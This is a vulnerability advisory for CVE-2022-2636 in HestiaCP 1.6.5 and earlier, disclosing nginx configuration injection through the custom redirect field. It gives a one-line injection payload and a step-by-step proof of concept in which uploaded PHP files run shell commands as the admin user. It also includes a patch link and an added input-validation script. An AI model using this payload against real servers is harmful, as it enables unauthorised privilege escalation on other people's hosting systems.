CVE-2022-2636 HestiaCP Privilege Escalation Nginx Conf Priv Esc

Privilege Escalation

HestiaCP <= 1.6.5 is vulnerable to privilege escalation. Improper input validation allows an attacker to escalate privileges and can crash the nginx server. There is no input validation in v-add-web-domain-redirect (line 82) or of the v-redirect-custom input on the “Edit Web Domain” page; the input is written directly to the /home/user/conf/web/domain.com/nginx.conf_redirect file, which is included from the /home/user/conf/web/domain.com/nginx.conf file.

/home/user/conf/web/domain.com/nginx.conf

...
    location ~ /\.(?!well-known\/|file) {
        deny all;
        return 404;
    }

    include /home/test/conf/web/poc.com/nginx.conf_*;
}

/home/user/conf/web/domain.com/nginx.conf_redirect file before payload (input is asd)

if ($host != "asd") {
   return 301 $scheme://asd$request_uri;
}

/home/user/conf/web/domain.com/nginx.conf_redirect file after payload

if ($host != "redStar$request_uri; ## " ) {}   location /adminShell.php { alias /home/test/web/poc.com/public_html/; fastcgi_param REQUEST_METHOD $request_method; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;fastcgi_pass unix:/var/run/php/php8.0-fpm-server.talhagunay.com.sock;  } if ( $host = false ) { #") {
   return 301 $scheme://redStar$request_uri; ## " ) {}   location /adminShell.php { alias /home/test/web/poc.com/public_html/; fastcgi_param REQUEST_METHOD $request_method; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;fastcgi_pass unix:/var/run/php/php8.0-fpm-server.talhagunay.com.sock;  } if ( $host = false ) { #$request_uri;
}
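The missing check, as an added example that is neither HestiaCP's code nor its actual patch: a POSIX sh allow-list validation for the custom redirect target, plus a writer that only emits the nginx.conf_redirect fragment shown above once the value passes. The function names and the fragment layout are assumptions.

```sh
#!/bin/sh
# Added example, not HestiaCP's own code: an allow-list check for the
# "Redirect visitors to a custom domain or web address" value before it
# is written into nginx.conf_redirect.
#
# The value lands inside `return 301 $scheme://<value>$request_uri;`, so
# quotes, semicolons, braces, '#', '$', whitespace or a newline can close
# that directive and inject further nginx configuration. Only a DNS-style
# hostname with an optional :port and URL-safe path is accepted.

# Returns 0 when the target is safe to embed, 1 otherwise.
validate_redirect_target() {
    target="$1"
    # Refuse empty values and anything longer than a DNS name can be.
    [ -n "$target" ] || return 1
    [ "${#target}" -le 255 ] || return 1
    # Reject embedded newlines before the per-line grep below sees them.
    [ "$(printf '%s' "$target" | wc -l)" -eq 0 ] || return 1
    # Strict POSIX ERE match; the value is never expanded by the shell.
    printf '%s\n' "$target" | grep -Eq \
        '^([A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?(:[0-9]{1,5})?(/[A-Za-z0-9._~%/-]*)?$'
}

# Writes the redirect fragment in the shape shown on this page (assumed
# layout), but only after the target has passed validation.
write_redirect_conf() {
    target="$1"
    out="$2"
    validate_redirect_target "$target" || return 1
    # Host part for the $host comparison: strip any :port or /path.
    host=$(printf '%s\n' "$target" | sed -E 's#[:/].*$##')
    printf 'if ($host != "%s") {\n    return 301 $scheme://%s$request_uri;\n}\n' \
        "$host" "$target" > "$out"
}
```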

PoC

  1. Payload (has to be one line!)
    redStar$request_uri; ## " ) {}   location /adminShell.php { alias [FULLPATHINFO]; fastcgi_param REQUEST_METHOD $request_method; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;fastcgi_pass unix:/var/run/php/php8.0-fpm-[HOSTNAME].sock;  } if ( $host = false ) { #
    
  2. Log in as a user.
  3. Create a domain in the dashboard.
  4. Go to Files in the top bar.
  5. Go to the “public_html” folder and create a PHP file with the contents below. Open the PHP file in a browser and use the full path and hostname it prints to fill in the [FULLPATHINFO] and [HOSTNAME] placeholders in the payload.
     x.php
    
     <?php

     echo getcwd();
     echo "<br>";
     system("hostname");
    
  6. Go to the “Edit Web Domain” page in the dashboard, select “Enable domain redirection”, then select “Redirect visitors to a custom domain or web address”, enter the payload in the text box and click the Save button.
  7. Go to the “public_html” folder and create a PHP file named adminShell.php:
     adminShell.php
    
     <?php
     system("id; whoami;");
    
  8. Visit /adminShell.php in a browser; the commands run as the “admin” user.

PoC Video

Patch Commit

https://github.com/hestiacp/hestiacp/commit/b178b9719bb2c98cf8a6db70065086f596afad81